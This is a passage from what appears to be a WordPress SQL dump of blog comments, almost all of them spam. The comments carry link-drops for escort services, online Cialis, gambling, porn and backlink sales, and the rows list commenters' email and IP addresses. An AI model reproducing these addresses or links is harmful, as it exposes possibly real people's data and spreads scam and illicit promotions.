Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5748,2126,'ulijagibek','oxoazuni@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-13 01:12:10','2022-02-13 01:12:10','http://slkjfdf.net/ - Akolux Owiocasdq btt.swnk.tummyrevolution.com.ytk.ni http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(5749,2126,'ilozunaipo','efeculayi@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-13 01:31:44','2022-02-13 01:31:44','http://slkjfdf.net/ - Aruwuma Orajozi fln.dgvm.tummyrevolution.com.rab.oj http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49','comment',0,0),(5750,2126,'ohcusihxux','erigulub@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-13 01:47:25','2022-02-13 01:47:25','http://slkjfdf.net/ - Ahikase Ehoyocab bvn.ekkc.tummyrevolution.com.ilo.uu http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(5751,2126,'gonenat','asiqiyigk@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-13 02:02:13','2022-02-13 02:02:13','http://slkjfdf.net/ - Ugapse Obuxoc sus.kaph.tummyrevolution.com.xtl.lt http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49','comment',0,0),(5884,5410,'Sexy Girl Photos','Sexy@gmail.com','https://www.much.pw/','124.223.96.23','2022-02-22 21:06:16','2022-02-22 21:06:16','Hi Man,How Are You Doing',0,'0','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','comment',0,0),(5901,4716,'efoqehiba','inuuyu@mnawl.sibicomail.com','http://slkjfdf.net/','217.145.226.29','2022-02-24 05:29:36','2022-02-24 05:29:36','http://slkjfdf.net/ - Akuleyol Ihopavuq lyh.xbjm.tummyrevolution.com.wac.sm http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5902,4716,'orateukzoroy','azosofix@mnawl.sibicomail.com','http://slkjfdf.net/','45.148.234.203','2022-02-24 05:43:15','2022-02-24 05:43:15','http://slkjfdf.net/ - Useutawi Jokgogaza yjs.zizp.tummyrevolution.com.ldt.hi http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5904,4716,'idelikiomefa','osuruaca@ayosd.sibicomail.com','http://slkjfdf.net/','194.156.124.113','2022-02-24 07:39:56','2022-02-24 07:39:56','http://slkjfdf.net/ - Oujicfu Itwifepi yar.ynrq.tummyrevolution.com.yhy.ai http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36','comment',0,0),(5905,4716,'uzebwxepur','uabumi@ayosd.sibicomail.com','http://slkjfdf.net/','185.68.246.41','2022-02-24 07:53:35','2022-02-24 07:53:35','http://slkjfdf.net/ - Ioezohozu Efediosud hmd.kius.tummyrevolution.com.nbn.pl http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36','comment',0,0),(5906,4716,'rultobijajo','ayecujgu@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 08:50:09','2022-02-24 08:50:09','Urihoq Uuqoyameg jmb.ltdt.tummyrevolution.com.lon.zq http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49','comment',0,0),(5907,4716,'ovotoma','oqowed@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 08:58:53','2022-02-24 08:58:53','Uzatug Amgadi ewz.xxaz.tummyrevolution.com.jsu.du http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5909,4716,'otatebihzan','ayayunu@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 10:24:25','2022-02-24 10:24:25','Atusuug Imesaveu cqp.awgr.tummyrevolution.com.rnt.gr http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5910,4716,'izranoxiwu','oxoqes@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 10:33:23','2022-02-24 10:33:23','Omenayan Unefadabu bna.dkge.tummyrevolution.com.rto.fe http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5911,4716,'ifekatiziumi','ogumale@ereqd.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-24 11:16:16','2022-02-24 11:16:16','http://slkjfdf.net/ - Tuavizozi Oydifo kln.xhtg.tummyrevolution.com.egp.fz http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5912,4716,'ezidebeje','uexaezzua@ereqd.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-24 11:25:47','2022-02-24 11:25:47','http://slkjfdf.net/ - Ozawav Awuyeyu dmx.zwwk.tummyrevolution.com.njp.hq http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(5913,4716,'icetuxooftxay','ekibew@ereqd.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-02-24 11:36:07','2022-02-24 11:36:07','http://slkjfdf.net/ - Iukovu Ecipni ixa.uuow.tummyrevolution.com.baa.ax http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(5914,4716,'midiptek','otehwul@natke.letiasmail.com','http://slkjfdf.net/','178.159.100.11','2022-02-24 13:48:30','2022-02-24 13:48:30','http://slkjfdf.net/ - Abuhohur Aliyori ndy.xtbr.tummyrevolution.com.zyj.jq http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5915,4716,'evurkijiz','ierarica@natke.letiasmail.com','http://slkjfdf.net/','5.181.168.224','2022-02-24 14:07:23','2022-02-24 14:07:23','http://slkjfdf.net/ - Goduhe Ayakyoh sif.jiaz.tummyrevolution.com.rfh.cc http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5916,4716,'ibuvaroda','oliwhi@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 14:21:43','2022-02-24 14:21:43','Afobepu Enehie vzc.iqpt.tummyrevolution.com.dpc.mk http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5917,4716,'iuwajukonixpu','enuqqo@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-24 14:31:38','2022-02-24 14:31:38','Azuasaziq Olahixuta mta.yacw.tummyrevolution.com.bti.qg http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5918,4716,'utekasarexu','hukalinob@mnawl.sibicomail.com','http://slkjfdf.net/','193.202.80.152','2022-02-24 15:07:13','2022-02-24 15:07:13','http://slkjfdf.net/ - Asahex Awumisovo rch.ydyj.tummyrevolution.com.zxw.lx http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5919,4716,'ihuyunaqejek','pumuzwe@mnawl.sibicomail.com','http://slkjfdf.net/','212.115.51.151','2022-02-24 15:19:54','2022-02-24 15:19:54','http://slkjfdf.net/ - Ayaves Efabiful zkj.kcxt.tummyrevolution.com.cec.td http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5999,4674,'Florrie O\'Brien','florrie.obrien@outlook.com','','45.199.134.179','2022-03-04 09:16:27','2022-03-04 09:16:27','You are looking for Free Backlinks then you came to the right place. \r\n\r\nWe offering you a free trial to try out our link-building service. \r\nThis can be used to link out to your website, inner page, google map, video, to any link you want to help power up and get more relevance too.\r\n\r\nWe want to prove to you that our backlinks work and so we’re willing to prove it to you risk-free. \r\nPlease create an account and then watch the video and submit your order details and let us help you get found online.\r\nFREE TEST HERE: https://zeep.ly/pKjOP?91568',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(6083,5354,'pharmeasy','cooperlittler@zoho.com','https://medicine-online.yolasite.com/','46.161.11.11','2022-03-14 11:05:08','2022-03-14 11:05:08','Quality posts is the important to attract the visitors to pay a quick \r\nvisit the web site, that\'s what this site is providing.',0,'0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','comment',0,0),(6126,4652,'נערות ליווי','yzjvco95er@gmail.com','https://romantik69.co.il/','185.220.101.73','2022-03-18 01:49:57','2022-03-18 01:49:57','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.135 Safari/537.36','comment',0,0),(6127,4819,'נערות ליווי','dz2pvz5@gmail.com','https://romantik69.co.il/','185.220.102.248','2022-03-18 01:50:14','2022-03-18 01:50:14','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Opera/9.80 (Windows NT 6.1; Win64; x64; Edition Yx) Presto/2.12.388 Version/12.15','comment',0,0),(6128,4713,'נערות ליווי','nj1kct@gmail.com','https://romantik69.co.il/','92.246.84.133','2022-03-18 01:50:22','2022-03-18 01:50:22','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; Touch; MASMJS)','comment',0,0),(6129,4659,'נערות ליווי','4uu8xoat@gmail.com','https://romantik69.co.il/','23.129.64.215','2022-03-18 01:50:32','2022-03-18 01:50:32','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36 u01-04','comment',0,0),(6130,5054,'נערות ליווי','e2xpnga@gmail.com','https://romantik69.co.il/','144.217.80.80','2022-03-18 01:50:39','2022-03-18 01:50:39','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.71 Safari/537.17 YE','comment',0,0),(6131,5060,'נערות ליווי','em4ps3@gmail.com','https://romantik69.co.il/','23.129.64.141','2022-03-18 01:51:07','2022-03-18 01:51:07','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2645.4 Safari/537.36','comment',0,0),(6132,5352,'נערות ליווי','b2ojneclp@gmail.com','https://romantik69.co.il/','95.141.35.15','2022-03-18 01:51:41','2022-03-18 01:51:41','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','comment',0,0),(6133,5410,'נערות ליווי','9c0s0v1l@gmail.com','https://romantik69.co.il/','109.70.100.30','2022-03-18 01:52:09','2022-03-18 01:52:09','This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! This is the right website for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I really would want toÖHaHa). You certainly put a brand new spin on a subject that has been discussed for many years. Wonderful stuff, just wonderful! נערות ליווי ברמלה',0,'0','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MASMJS)','comment',0,0),(6155,4674,'Rocky Raker','raker.rocky@gmail.com','','45.146.160.215','2022-03-21 02:43:34','2022-03-21 02:43:34','YOU NEED REAL VISITORS FOR: tummyrevolution.com ?\r\n \r\nWe Provide 100% Real Visitors To Your Website.\r\nWith this traffic, you can boost ranking in SERP, SEO, profit from CPM...\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST HERE=> https://www.fiverr.com/share/8AaDqo',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(6171,8,'Make Money','39178@gmail.com','https://bit.ly/3IXXHYB','38.242.225.116','2022-03-23 21:35:39','2022-03-23 21:35:39','See how you can earn $27 in 7 minutes! Read here - https://bit.ly/32NSumo',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(6186,5125,'ionipsync','ionipsync@oourmail.xyz','https://oscialipop.com','46.161.11.2','2022-03-26 16:55:56','2022-03-26 16:55:56','Pdgnqd https://oscialipop.com - Cialis Iwgvnu comprare cialis online viagra venta espana Rlmbco https://oscialipop.com - Cialis Provera 2.5mg Amenorrhoea',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(6259,4666,'Poerronge','Poerronge@maill1.xyz','https://oscialipop.com','46.161.11.144','2022-04-05 11:09:43','2022-04-05 11:09:43','Singapore Online Store Drug Xrxzgd https://oscialipop.com - Cialis Fvxppx Cialis In Italia legit cialis online Viagra In Osterreich Fnoyuy Sgjodt generic cialis softtabs buy online https://oscialipop.com - Cialis Csmwvt',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(6297,5410,'film izle','mariasanchezva@gmail.com','https://filmizlew.org/','51.159.37.33','2022-04-12 12:39:53','2022-04-12 12:39:53','Major thankies for the blog article. Thanks Again. Great. Rod Tarascio',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6298,5410,'film izle','colegio.traftremun@hotmail.com','https://filmizlew.org/','51.159.36.101','2022-04-12 18:34:28','2022-04-12 18:34:28','I visited several web sites except the audio quality for audio songs existing at this web site is in fact wonderful. Gordon Essepian',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6311,5410,'film izle','ccsandovalserrano@gmail.com','https://filmizlew.org/','51.159.37.51','2022-04-14 22:16:00','2022-04-14 22:16:00','Only wanna state that this is invaluable , Thanks for taking your time to write this. Alphonso Montrella',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6344,4652,'נערות ליווי בחיפה','6ou35j2@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.220.101.37','2022-04-21 05:45:27','2022-04-21 05:45:27','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/4.76 [en] (Windows NT 5.0; U)','comment',0,0),(6345,4819,'נערות ליווי בחיפה','ig691xu@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.220.101.73','2022-04-21 05:45:40','2022-04-21 05:45:40','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Linux armv6l; Maemo; Opera Mobi/8; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00','comment',0,0),(6346,4713,'נערות ליווי בחיפה','kd2ojj2k8@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.129.61.3','2022-04-21 05:45:50','2022-04-21 05:45:50','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Linux armv6l; Maemo; Opera Mobi/8; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00','comment',0,0),(6347,4659,'נערות ליווי בחיפה','r2shzay86@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.220.101.66','2022-04-21 05:45:58','2022-04-21 05:45:58','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25','comment',0,0),(6348,5054,'נערות ליווי בחיפה','vujkczg4@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','23.128.248.63','2022-04-21 05:46:06','2022-04-21 05:46:06','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','comment',0,0),(6349,5060,'נערות ליווי בחיפה','5qkobijg@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','107.189.10.218','2022-04-21 05:46:13','2022-04-21 05:46:13','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6','comment',0,0),(6350,5354,'נערות ליווי בחיפה','7jojue@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.220.102.244','2022-04-21 05:46:22','2022-04-21 05:46:22','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0','comment',0,0),(6351,5352,'נערות ליווי בחיפה','7lfe71g@gmail.com','https://israel-lady.co.il/%D7%A0%D7%A2%D7%A8%D7%95%D7%AA-%D7%9C%D7%99%D7%95%D7%95%D7%99-%D7%91%D7%97%D7%99%D7%A4%D7%94/','185.220.100.252','2022-04-21 05:46:40','2022-04-21 05:46:40','You need to take part in a contest for one of the highest quality sites on the net. I am going to recommend this site!',0,'0','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16','comment',0,0),(6369,5410,'bahis oyna','cbmm54@gmail.com','https://filmizlew.org/','51.159.37.236','2022-04-25 13:26:49','2022-04-25 13:26:49','Asking questions are genuinely pleasant thing if you are not understanding anything completely, but this post offers nice understanding even. Britt Anguiano',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6373,5410,'kacak bahis siteleri','mateo1811@gmail.com','https://www.720p-fullizleme.com/','51.159.37.51','2022-04-27 06:20:55','2022-04-27 06:20:55','I really like and appreciate your article post. Thanks Again. Keep writing. Linwood Zrimsek',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6374,5410,'sikis izle','miguel.paz.arq@gmail.com','https://www.720p-fullizleme.com/','51.159.37.178','2022-04-27 10:26:22','2022-04-27 10:26:22','I really love your blog.. Very nice colors & theme. Allen Mcgahan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6455,5410,'turkce dublaj izle','tamarafernandez@hotmail.com','https://www.hazirfilm.com/','51.159.37.236','2022-05-26 17:02:55','2022-05-26 17:02:55','Yay google is my world beater helped me to find this great website ! . Lance Kraft',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6456,5410,'turkce dublaj izle','maritzaravello@gmail.com','https://www.hazirfilm.com/','51.159.37.178','2022-05-26 20:59:57','2022-05-26 20:59:57','Ahaa, its fastidious discussion concerning this article at this place at this webpage, I have read all that, so now me also commenting at this place. Johnson Winch',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6460,5410,'sikis izle','raf_bas@hotmail.com','https://www.fullhdfilmizlesene.pw/yil/2021-film-izle','51.159.37.51','2022-05-27 21:32:25','2022-05-27 21:32:25','It is very important for you to stay well hydrated before and after you play a game. Mac Solie',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6464,5410,'kacak bahis siteleri','amalisot@gmail.com','https://www.fullhdfilmizlesene.pw/yil/2021-film-izle','51.159.37.178','2022-05-28 01:46:00','2022-05-28 01:46:00','Fantastic article post. Really looking forward to read more. Fantastic. Jeramy Bowsher',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6468,5410,'bets10 giris','apostolsanpablo@hotmail.com','https://www.hazirfilm.com/','51.159.36.122','2022-05-30 09:38:36','2022-05-30 09:38:36','Amazing! Its really amazing post, I have got much clear idea on the topic of from this paragraph. Raphael Sweatmon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6469,5410,'kacak bahis siteleri','gloriagim@hotmail.com','https://www.hazirfilm.com/','51.159.37.51','2022-05-30 13:54:11','2022-05-30 13:54:11','Fastidious answers in return of this matter with genuine arguments and telling everything about that. Dallas Heimbigner',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6513,5410,'türkçe dublaj','esterrous@hotmail.com','https://www.fullhdfilmizlesene.pw/filmizle/turkce-dublaj-hd-film-izle','51.159.37.178','2022-06-09 00:54:03','2022-06-09 00:54:03','Awesome article post. Really looking forward to read more. Cool. Noe Bloomingdale',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6515,5410,'türkçe dublaj film izle','seba12353@hotmail.com','https://www.fullhdfilmizlesene.pw/filmizle/turkce-dublaj-hd-film-izle','51.15.26.92','2022-06-09 04:52:42','2022-06-09 04:52:42','Excellent article. I am going through many of these issues as well.. Graham Pannunzio',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6575,5410,'online bahis casino','d_espinoza_ponce@hotmail.com','https://filmizle2022.com/','51.159.36.102','2022-06-22 22:11:34','2022-06-22 22:11:34','Some really prime articles on this website , bookmarked . Demarcus Mire',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6583,2132,'odzladie','ebigadciy@ideaj.fodiscomail.com','http://slkjfdf.net/','54.39.50.123','2022-06-27 01:16:39','2022-06-27 01:16:39','http://slkjfdf.net/ - Ugigey Uukekabi qhy.kood.tummyrevolution.com.dgs.ow http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(6621,5410,'porno izle','victor_gallardo@vtr.net','https://jetfilmizle.eu/','51.159.37.178','2022-07-09 02:02:37','2022-07-09 02:02:37','Really appreciate you sharing this blog article. Thanks Again. Cool. Marty Maffia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6622,5410,'kacak bahis siteleri','jdiaze7187@hotmail.com','https://jetfilmizle.eu/','51.159.36.139','2022-07-09 07:37:25','2022-07-09 07:37:25','At this moment I am going to do my breakfast, later than having my breakfast coming again to read more 